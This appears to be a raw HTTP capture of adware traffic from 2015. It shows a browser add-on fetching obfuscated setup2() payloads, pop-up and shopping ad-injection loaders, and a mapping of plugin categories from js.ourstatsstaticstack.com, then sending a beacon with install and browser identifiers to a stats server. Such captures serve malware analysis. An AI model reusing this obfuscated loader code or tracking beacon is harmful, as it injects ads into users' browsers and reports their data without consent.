GET /plugins/mins/390.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425996283"
Last-Modified: Tue, 10 Mar 2015 14:04:43 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop003.fr7.t,1427668152.cds025.fr7.c
if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }....
GET /plugins/mins/281.js?ver=3&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1423758037"
Last-Modified: Thu, 12 Feb 2015 16:20:37 GMT
Cache-Control: max-age=900
Content-Length: 455
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop003.fr7.t,1427668152.cds021.fr7.c
if (typeof setup2 === 'function') { setup2('MGE2YjdhNWIwMDE3MTAxMTJkMTExZDQzNDk1OTRhMGIxMDE1MDg1OTVlNGUxMDE1MDMwNzAxMDAxNDEwNWYwMjFjMTQ0NzAyMDAzMjFkMTEwNzA0NWMxZTBkMTczMDAwMWY1YzAxMDgxNzQ0NTk1MjU0NTM0OTQ1MTIwODE3NDQzNzNjMjczMzM3MzAyMjMzM2EzZDJkMzEzYjI0MjAzNzM0MmYzNzNjMmMzYzM3MzQzYTNjMzgyNTJjMjY0ZTAyMTQxMTM2MDIxYzA0NGUyNjM3MjAzNjJlMmIzMDIzMjgzNzNjM2EzYzI1MzEyODNjM2YyMDNlM2MzNzNjNDY0ZDcyNmE1MzExMWYwYzBmMGEwYTI4MWM0MTRiNDE0MTQxNTk2OTE5', 'qasyhcdaxc'); }....
GET /plugins/mins/260.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263875"
Last-Modified: Sun, 13 Jul 2014 15:04:35 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds034.fr7.c
if (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMWYxYzU4NDg1NjQ3MWMxNjFiMTg1NzVmNTUwNTA1NGIwNDEwMDYwYjA4MTQxZjA2MTMwNjAwNGMwYzA3MDA1ZjA5NWQwNjAxMWUxMTVhNWI1YjQyNGIxMzQ2NTM0NTU1MGI1YjA5NWUxMDAxNDkxNjFkMDY1MjM3MzIzMzI4M2QyNTM2MjYyYjJiMmQzZjJmM2YyYTIyMjAzYTI2MmEyYzMyMjMyZjMwMjkyYzMwM2QzMDRlMGMwMDBhMWMxNzA4MTE1ZjMwMzcyZTIyMzUyMTI1MzczZDI2MmEzYTMyMzEyYTIyMjkyYjM1MmYyYTM3MzI1MjU2Nzg3ZjQ3MWMxNjFiMTgxZTI1MDgxZTU0NWY1NDQwMDcxYzE5MDAwOTQ4NTk0YTAzMTE0MTE4MWYxOTE5MTcxMjAwMDAwNzBjMWM0MzEzMTUxZjU5MTY1YjEyMGIwMjFlNDU0OTQ0NDQ1NDE1NTI1OTU5NWExNDQ5MTY1ODBmMDc1ZDFjMDEwOTRkMjUyZDM1MzczYjMxM2MzYTI0MzQzZjIwMjkyMDJjMzYyYTI2MjkzNTNlMmQyNTMwMzYzZDI2MmMzMjJmNWMxMzA2MTUxYTAzMDIwZDUwMmYyNTMxMjQyYTI3MzEzZDIxMjkzNTI4MmQzNzM1MjQzZDIxMjkyMDM1MjUyZDU0NDk3ZTZiNGQxODAxMDUxZDFiMTgyYzEwNDA1NTQ4NWY0NjRhNzgwYg==', 'pzrvetbohm'); }....
GET /plugins/mins/288.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426880306"
Last-Modified: Fri, 20 Mar 2015 19:38:26 GMT
Cache-Control: max-age=900
Content-Length: 963
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds021.fr7.c
if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MTcxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBkMWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1MjEyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMzkyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMxMjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMTAwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkxMjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNWMwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNhNTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYzM3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIzOTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMTMwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }....
GET /plugins/mins/233.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273128"
Last-Modified: Sun, 17 Aug 2014 10:58:48 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds022.fr7.c
if (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MDcxNjRmNDg0ZTU3MGMxMjFhMTM0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjFhMWEwMTE0MTUzYjExMTk1ODU3NTI0YzFkMTAxMjFlMTA0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjAyMDIwMDAzMGYwMDJhMTE1ODU3NTI1YzQ2NTc0YTY0NDM1NTVhNGQ1MDE4MTAxNjEyMDcwMDE0MTY0ZjQ4NGUyZTQ2MDcwYTEwNTcyNzQxNzg0ZTU1NDQ0NjRjMGExYjE2MDQxYzBiM2YzNzQ0NTQ0MzU3MGQwNDFjMGExYTEzNDgzMTExMDMwMDVjNDU1ZTQ1MWM1NzVlNTY0NTVhNTA1MjE1NTU0MzE2MWIwMTE5MTMxZTFhMGIwNzNiMTUxYjAxMWMxZTRhNDg0ZTUyM2IzOTJkMzEzYTI5M2UyMDI3MzEyMTM0MzEyNjJkMmUyODNjMmEzMDIwMzkzZDM2MzcyNTI0MzYzMTJhNDM0YTRlNDQxNDFlMDkxZDAwMWIwNTBiMGI0NDRmNWE0YTJkMzEzNjM2MjkzZDMwMjczMzI5MzczYzJhMjUzNjNlM2MzYjNiMjAzNzMxMmE0MzFiNTU0MTdmMDc=', 'zmrnudfncu'); }....
GET /plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405929866"
Last-Modified: Mon, 21 Jul 2014 08:04:26 GMT
Cache-Control: max-age=142
Content-Length: 508
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds026.fr7.c
appAPI.internal.monetization = appAPI.internal.monetization || {};.if (typeof appAPI.internal.monetization.plugins === "undefined") { appAPI.internal.monetization.plugins = {}; }..appAPI.internal.monetization.plugins[226] = function() {..if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) {...if (appAPI.internal.monetization.getCampaignId() == 0) {....appAPI.internal.monetization.loader.setCampaignId(1026);...}..}.};....
GET /plugins/mins/221.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404650838"
Last-Modified: Sun, 06 Jul 2014 12:47:18 GMT
Cache-Control: max-age=900
Content-Length: 413
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds015.fr7.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"DOWNLOADS"}))();};....
GET /plugins/mins/195.js?ver=28&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404650834"
Last-Modified: Sun, 06 Jul 2014 12:47:14 GMT
Cache-Control: max-age=900
Content-Length: 408
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds008.fr7.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"LITE"}))();};....
GET /plugins/mins/7.js?ver=2&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1402409611"
Last-Modified: Tue, 10 Jun 2014 14:13:31 GMT
Cache-Control: max-age=900
Content-Length: 683
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668153.cds037.fr7.c
appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};....
GET /plugins/mins/193.js?ver=9&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273131"
Last-Modified: Sun, 17 Aug 2014 10:58:51 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds008.fr7.c
if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }....
GET /plugins/mins/180.js?ver=12&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405846499"
Last-Modified: Sun, 20 Jul 2014 08:54:59 GMT
Cache-Control: max-age=900
Content-Length: 1383
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds020.fr7.c
if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QzYjM5MjkzNTJkMjQyYjMxMzg0NDU4NTg1YTE1MTcwYjVlNTM1MTUxNTk1ODVhMDE0NTVlNTg1ZDUwNTA1ODUzNWE1MzQ0NTg1ODVjNDExNjBiMDMwODVhMmQzMjJjM2MyODMxM2QzODI1MjMzNzNmMzAyZjM3MzIzMTIzMjgzODJkNGIxYjFiMGUwNjUzMzUzMzI0MjAyMjNjM2QzNTJiMmEyZjNlMzgzYjIzM2MzYTI2MmUyMjJmM2UzODI3M2UyYTNjMzgyYjJhMzUzMzQ1NWU2NzY2NGMxNzBlMWIwZDA1MDkzYjA5NGQ1NDQ3NTM1NjVhNjYxYQ==', 'njlgrmongb'); }....
<<< skipped >>>
GET /plugins/mins/91.js?ver=135&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427097623"
Last-Modified: Mon, 23 Mar 2015 08:00:23 GMT
Cache-Control: max-age=492
Content-Length: 187756
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds012.fr7.c
(function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};var a=function(at){if(typeof at=="string"&&typeof at.trim=="function"){return at.trim();}return at==null?"":at.toString().replace(/^\s /,"").replace(/\s $/,"");};function f(at){var au=z[at]={},av,aw;at=at.split(/\s /);for(av=0,aw=at.length;av<aw;av ){au[at[av]]=true;}return au;}var H=function(at,au){var aw=[];for(var av=0;av<at.length;av ){if(av in at){var ax=au(at[av],av,at);if(ax!=null){aw.push(ax);}}}return aw;};var ad=function(aw,az,av){var au,ax=0,ay=aw.length,at=ay===undefined||appAPI.utils.isFunction(aw);if(av){if(at){for(au in aw){if(az.apply(aw[au],av)===false){break;}}}else{for(;ax<ay;){if(az.apply(aw[ax ],av)===false){break;}}}}else{if(at){for(au in aw){if(az.call(aw[au],au,aw[au])===false){break;}}}else{for(;ax<ay;){if(az.call(aw[ax],ax,aw[ax ])===false){break;}}}}return aw;};var J=function(av){av=av?(z[av]||f(av)):{};var aA=[],aB=[],aw,ax,au,ay,az,aD=function(aE){var aF,aI,aH,aG,aJ;for(aF=0,aI=aE.length;aF<aI;aF ){aH=aE[aF];aG=appAPI.utils.isArray(aH)?"array":(appAPI.utils.isFunction(aH)?"function":"");if(aG==="array"){aD(aH);}else{if(aG==="function"){if(!av.unique||!aC.has(aH)){aA.push(aH);}}}}},at=function(aF,aE){aE=aE||[];aw=!av.memory||[aF,aE];ax=true;az=au||0;au=0;ay=aA.length;for(;aA&&az<ay;az ){if(aA[az].apply(aF,aE)===false&&av.stopOnFalse){aw=true;break;}}ax=false;if(aA){if(!av.once){if(aB&&aB.length){aw=aB.shift();aC.fireWith(aw[0],aw[1]);}}else{if(aw===true){aC.disable();}else{aA=[];}}}},aC={add
<<< skipped >>>
GET /plugins/mins/345.js?ver=13&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426517806"
Last-Modified: Mon, 16 Mar 2015 14:56:46 GMT
Cache-Control: max-age=900
Content-Length: 645
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668152.cds012.fr7.c
__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390],intext:[103,117,123,142,259,263,342,359,360,391],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389]};....
GET /plugins/mins/253.js?ver=2&rnd=6500 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1417718237"
Last-Modified: Thu, 04 Dec 2014 18:37:17 GMT
Cache-Control: max-age=900
Content-Length: 735
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668153.cds026.fr7.c
if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }....
GET /plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6500 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1407922596"
Last-Modified: Wed, 13 Aug 2014 09:36:36 GMT
Cache-Control: max-age=805
Content-Length: 94779
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop003.fr7.t,1427668153.cds026.fr7.c
var jQuery = $jquery_171 = $jquery = null;..if (document && typeof document.getElementById !== "undefined") {../*! jQuery v1.7.1 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g ){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k];if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from "
<<< skipped >>>
GET /apps.gif?action=update&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&subid=0&zdata=0&appver=111&bgver=1&pluginsver=103&curtime=1427668154&lifetime=32&oldappver=22&oldbgver=1&oldpluginsver=17&rnd=270 HTTP/1.1
Accept: */*
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 0MDsJw0wieJKNphn6oEhWe3FuJFCpMROJRepge/i3uG2VsN/u5mYBOAnPcwYVkAvpHrXcXsSUi0=
x-amz-request-id: 8DB28FFF27574AB6
Date: Sun, 29 Mar 2015 22:29:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
